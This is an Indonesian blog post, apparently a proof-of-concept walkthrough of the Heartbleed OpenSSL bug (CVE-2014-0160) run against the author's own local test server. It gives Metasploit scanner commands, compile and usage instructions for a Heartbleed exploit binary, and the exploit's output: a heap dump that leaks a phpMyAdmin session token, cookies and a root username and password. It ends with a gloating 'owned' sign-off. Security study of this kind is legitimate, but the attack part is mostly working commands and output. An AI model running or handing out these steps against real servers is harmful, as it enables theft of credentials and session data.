- Heartbleed All Mighty: Easy Explanation How Does It Works
- Heartbleed All Mighty: How Can This Be?!
- Heartbleed All Mighty: Massive Security Bug In OpenSSL
Dalam status saya tempo lalu, saya sebenarnya hendak meluncurkan PoC dari Heartbleed Bug pada tanggal 11 April. Namun kakak saya Krisan Alfa menyarankan agar saya meluncurkan serangan ke local server agar tidak timbul kerugian bagi pihak lain. Make sense! Dan salah satu partner saya Alfath juga menyarankan hal yang sama. Jadi saya mengambil keputusan untuk meracik sebuah vulnerable server untuk mewujudkan PoC ini. Thanks both of you, guys! You rocks!
PoC sendiri memiliki struktur yang idelnya (menurut saya) digambarkan dengan susunan seperti ini
- Introduction of Bug
- Explanation how Bug works
- Po(Bug)C [Prove of Bug Concept]
- Prevent Bug
Berikut spesifikasi vulnerable server yang berhasil saya buat
- Debian 7.4.0 Wheezy amd64 (available here)
- Kernel 3.2.0-4 (included in Debian 7.4.0)
- Apache 2.4.9 (available here)
- PHP 5.4.27 (available here)
- OpenSSL 1.0.1e (available here)
- PHPMyAdmin 4.1.13 (available here)
- Server installed on vmplayer 6.0.1
- Server IP Address 192.168.145.128
- HTTP web service 192.168.145.128:80
- HTTPS web service 192.168.145.128:443 (port ini yang akan kita uji)
Berikut tools yang saya gunakan dalam melakukan penetration test
Dan tahukah kamu, berapa waktu yang saya butuhkan untuk membuat vulnerable server ini? 10 jam! Anyway, back to PoC. And here we go!
Metasploit in Action
Dalam tutorial ini saya menggunakan auxiliary heartbleed untuk melakukan pemindaian target, untuk mencari tau apakah mesin dapat diretas
msf > use auxiliary/scanner/ssl/openssl_heartbleed
Kemudian saya mengatur RHOST dengan IP target yaitu 192.168.145.128
msf auxiliary(openssl_heartbleed) > set RHOSTS 192.168.145.128
Dan
msf auxiliary(openssl_heartbleed) > exploit
[+] 192.168.145.128:443 - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
BOOM! Hasil pemindaian menyatakan bahwa server ini vulnerable terhadap Heartbleed Bug CVE-2014-0160.
Let's Load The Gun!
Copy C code di bawah ini atau download, kemudian rename dengan nama heartbleed.c
Compile source dengan gcc
NOTE: Versi GCC yang saya gunakan adalah GCC version: Debian 4.6.3-14 4.6.3
HOW TO COMPILE WITH DEBIAN
$ gcc heartbleed.c -o heartbleed -Wl,-Bstatic -lssl -Wl,-Bdynamic -lssl3 -lcrypto
HOW TO COMPILE WITH ARCH
$ gcc -lssl -lssl3 -lcrypto heartbleed.c -o heartbleed
Jika kamu menggunakan DEBIAN based dan GAGAL, coba dengan versi ARCH LINUX!
Thanks for Damar Bungispo Girhan for pointing me to that problem! :D
Setelah itu akan muncul file binary heartbleed pada working directory kamu. Check file binary tersebut dengan perintah:
$ file heartbleed heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, not stripped
Lakukan stripping binary file dengan perintah
$ strip heartbleed
Kemudian check kembali file binary dengan perintah
$ file heartbleed heartbleed: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.26, BuildID[sha1]=0x475e2360fbc2037f413f14856a779342dbe6e8d8, stripped
Lock and loaded!
How to Use Heartbleed Exploit?
$ ./heartbleed [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit [ ============================================================= [ try --help
$ ./heartbleed --help [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit [ ============================================================= [ [ --server|-s <ip/dns> - the server to target [ --port|-p <port> - the port to target [ --file|-f <filename> - file to write data to [ --bind|-b <ip> - bind to ip for exploiting clients [ --precmd|-c <n> - send precmd buffer (STARTTLS) [ 0 = SMTP [ 1 = POP3 [ 2 = IMAP [ --loop|-l - loop the exploit attempts [ --type|-t <n> - select exploit to try [ 0 = null length [ 1 = max leak [ n = heartbeat payload_length [ [ --verbose|-v - output leak to screen [ --help|-h - this output [
Shoot the heart!
$ ./heartbleed -s 192.168.145.128 -p 443 -t 1 -f dumpfile [ heartbleed - CVE-2014-0160 - OpenSSL information leak exploit [ ============================================================= [ connecting to 192.168.145.128 443/tcp [ connected to 192.168.145.128 443/tcp [ <3 <3 <3 heart bleed <3 <3 <3 [ heartbeat returned type=24 length=16408 [ decrypting SSL packet [ heartbleed leaked length=65535 [ final record type=24, length=16384 [ wrote 16381 bytes of heap to file 'dumpfile' [ heartbeat returned type=24 length=16408 [ decrypting SSL packet [ final record type=24, length=16384 [ wrote 16384 bytes of heap to file 'dumpfile' [ heartbeat returned type=24 length=16408 [ decrypting SSL packet [ final record type=24, length=16384 [ wrote 16384 bytes of heap to file 'dumpfile' [ heartbeat returned type=24 length=16408 [ decrypting SSL packet [ final record type=24, length=16384 [ wrote 16384 bytes of heap to file 'dumpfile' [ heartbeat returned type=24 length=42 [ decrypting SSL packet [ final record type=24, length=18 [ wrote 18 bytes of heap to file 'dumpfile' [ done.
He's bleeding like a woman had menstruation! LOL! Sekarang kita lihat hasil dump kita
$ 00000000 76 73 ca 02 b4 c4 7f 18 d7 5b cb 07 16 98 b4 b9 |vs.......[......| 00000010 ba dc db dd dc 3e 84 ef cd 92 0a 4e 5e dc b1 91 |.....>.....N^...|
[SNIP]
00000120 02 03 03 02 01 02 02 02 03 01 01 00 0f 00 01 01 |................|
00000130 4d 4c 2c 20 6c 69 6b 65 20 47 65 63 6b 6f 29 20 |ML, like Gecko) |
00000140 43 68 72 6f 6d 65 2f 33 33 2e 30 2e 31 37 35 30 |Chrome/33.0.1750|
00000150 2e 31 35 32 20 53 61 66 61 72 69 2f 35 33 37 2e |.152 Safari/537.|
00000160 33 36 0d 0a 52 65 66 65 72 65 72 3a 20 68 74 74 |36..Referer: htt|
00000170 70 73 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 34 35 |ps://192.168.145|
00000180 2e 31 32 38 2f 70 68 70 6d 79 61 64 6d 69 6e 2f |.128/phpmyadmin/|
00000190 69 6e 64 65 78 2e 70 68 70 3f 64 62 3d 26 74 61 |index.php?db=&ta|
000001a0 62 6c 65 3d 26 73 65 72 76 65 72 3d 31 26 74 61 |ble=&server=1&ta|
000001b0 72 67 65 74 3d 26 74 6f 6b 65 6e 3d 32 39 63 66 |rget=&token=29cf|
000001c0 33 30 39 61 64 66 61 62 37 37 31 62 61 64 35 63 |309adfab771bad5c|
000001d0 61 64 35 66 34 33 63 62 32 32 31 63 0d 0a 41 63 |ad5f43cb221c..Ac|
000001e0 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 3a 20 67 |cept-Encoding: g|
000001f0 7a 69 70 2c 64 65 66 6c 61 74 65 2c 73 64 63 68 |zip,deflate,sdch|
00000200 0d 0a 41 63 63 65 70 74 2d 4c 61 6e 67 75 61 67 |..Accept-Languag|
00000210 65 3a 20 65 6e 2d 55 53 2c 65 6e 3b 71 3d 30 2e |e: en-US,en;q=0.|
00000220 38 2c 69 64 3b 71 3d 30 2e 36 2c 6d 73 3b 71 3d |8,id;q=0.6,ms;q=|
00000230 30 2e 34 0d 0a 43 6f 6f 6b 69 65 3a 20 70 6d 61 |0.4..Cookie: pma|
00000240 5f 6c 61 6e 67 3d 65 6e 3b 20 70 6d 61 5f 63 6f |_lang=en; pma_co|
00000250 6c 6c 61 74 69 6f 6e 5f 63 6f 6e 6e 65 63 74 69 |llation_connecti|
00000260 6f 6e 3d 75 74 66 38 5f 67 65 6e 65 72 61 6c 5f |on=utf8_general_|
00000270 63 69 3b 20 70 6d 61 5f 6d 63 72 79 70 74 5f 69 |ci; pma_mcrypt_i|
00000280 76 3d 79 33 63 6b 30 63 25 32 46 42 66 64 4d 25 |v=y3ck0c%2FBfdM%|
00000290 33 44 3b 20 70 68 70 4d 79 41 64 6d 69 6e 3d 70 |3D; phpMyAdmin=p|
000002a0 6e 35 63 37 31 70 33 61 74 35 68 37 6a 6e 6f 37 |n5c71p3at5h7jno7|
000002b0 63 36 34 36 30 64 69 33 6f 35 37 6a 65 65 34 3b |c6460di3o57jee4;|
000002c0 20 70 6d 61 55 73 65 72 2d 31 3d 71 30 46 48 74 | pmaUser-1=q0FHt|
000002d0 7a 4d 62 61 56 67 25 33 44 3b 20 70 6d 61 50 61 |zMbaVg%3D; pmaPa|
000002e0 73 73 2d 31 3d 77 41 63 33 48 45 75 42 55 6e 63 |ss-1=wAc3HEuBUnc|
000002f0 25 33 44 3b 20 70 6d 61 5f 6e 61 76 69 5f 77 69 |%3D; pma_navi_wi|
00000300 64 74 68 3d 32 30 30 0d 0a 0d 0a be 3c 63 c4 9e |dth=200.....<c..|
00000310 27 05 54 11 e9 50 f7 b7 c6 e2 a5 60 b9 b6 66 05 |'.T..P.....`..f.|
00000320 05 05 05 05 05 77 69 64 74 68 3d 32 30 30 0d 0a |.....width=200..|
00000330 0d 0a 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 72 |..pma_username=r|
00000340 6f 6f 74 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 |oot&pma_password|
00000350 3d 70 61 73 73 77 6f 72 64 26 73 65 72 76 65 72 |=password&server|
00000360 3d 31 26 74 61 72 67 65 74 3d 69 6e 64 65 78 2e |=1&target=index.|
00000370 70 68 70 26 74 6f 6b 65 6e 3d 32 39 63 66 33 30 |php&token=29cf30|
00000380 39 61 64 66 61 62 37 37 31 62 61 64 35 63 61 64 |9adfab771bad5cad|
00000390 35 66 34 33 63 62 32 32 31 63 50 0e d3 2f e3 8b |5f43cb221cP../..|
000003a0 9a 0e 71 b6 57 c9 2f e1 ae ac 5f e6 8f 5b 06 06 |..q.W./..._..[..|
000007a0 00 00 00 00 00 f8 08 66 01 00 00 00 00 c0 31 66 |.......f......1f|
000007b0 01 00 00 00 00 21 00 00 00 00 00 00 00 60 01 00 |.....!.......`..|
000007c0 00 00 00 00 00 20 74 69 74 6c 65 3d 22 00 80 e9 |..... title="...|
000007d0 00 00 00 00 00 21 00 00 00 00 00 00 00 80 01 00 |.....!..........|
000007e0 00 00 00 00 00 22 00 00 00 00 00 00 00 74 00 e9 |.....".......t..|
000007f0 00 00 00 00 00 60 00 00 00 00 00 00 00 21 00 00 |.....`.......!..|
00000800 00 00 00 00 00 18 80 e9 00 00 00 00 00 70 46 02 |.............pF.|
00000810 01 00 00 00 00 40 00 00 00 00 00 00 00 21 00 00 |.....@.......!..|
00000820 00 00 00 00 00 d8 7f e9 00 00 00 00 00 98 08 66 |...............f|
00000830 01 00 00 00 00 21 00 00 00 00 00 00 00 20 00 00 |.....!....... ..|
00000840 00 00 00 00 00 50 72 65 76 69 6f 75 73 00 7f e9 |.....Previous...|
00000850 00 00 00 00 00 31 00 00 00 00 00 00 00 f0 03 00 |.....1..........|
00000860 00 00 00 00 00 60 26 66 01 00 00 00 00 03 00 00 |.....`&f........|
00000870 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000880 00 00 01 00 00 f1 00 00 00 00 00 00 00 b8 e7 01 |................|
00000890 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 |................|
000008a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
[SNIP]
00000910 00 00 01 00 00 48 08 66 01 00 00 00 00 05 00 00 |.....H.f........|
00000920 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000930 00 00 01 00 00 88 08 66 01 00 00 00 00 09 00 00 |.......f........|
00000940 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000950 00 00 01 00 00 e8 08 66 01 00 00 00 00 04 00 00 |.......f........|
00000960 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000970 00 00 01 00 00 90 2f 01 00 00 00 00 00 f1 00 00 |....../.........|
00000980 00 00 00 00 00 48 b2 65 01 00 00 00 00 48 b2 65 |.....H.e.....H.e|
0000fdc0 01 00 00 00 00 74 65 64 22 00 00 00 00 39 00 00 |.....ted"....9..|
0000fdd0 00 00 00 00 00 68 00 00 00 00 00 00 00 70 6d 61 |.....h.......pma|
0000fde0 5f 67 65 74 72 65 6c 61 74 69 6f 6e 73 70 61 72 |_getrelationspar|
0000ffc0 65 73 00 00 00 40 00 00 00 00 00 00 00 21 00 00 |es...@.......!..|
0000ffd0 00 00 00 00 00 d0 1e c6 01 00 00 00 00 a0 2a 68 |..............*h|
0000ffe0 01 00 00 00 00 21 00 00 00 00 00 00 00 20 00 00 |.....!....... ..|
0000fff0 00 00 00 00 00 64 62 00 00 00 00 00 00 00 dc c8 |.....db.........|
00010000 4c 39 67 4b bc 9d ab 8f 47 8e 44 61 2b 0f 1d 78 |L9gK....G.Da+..x|
00010010 50 58 |PX|
00010012
pma_username=root
pma_password=password
YOU
ARE
SO
OWNED
BY
RED-DRAGON
@-)
ReplyDelete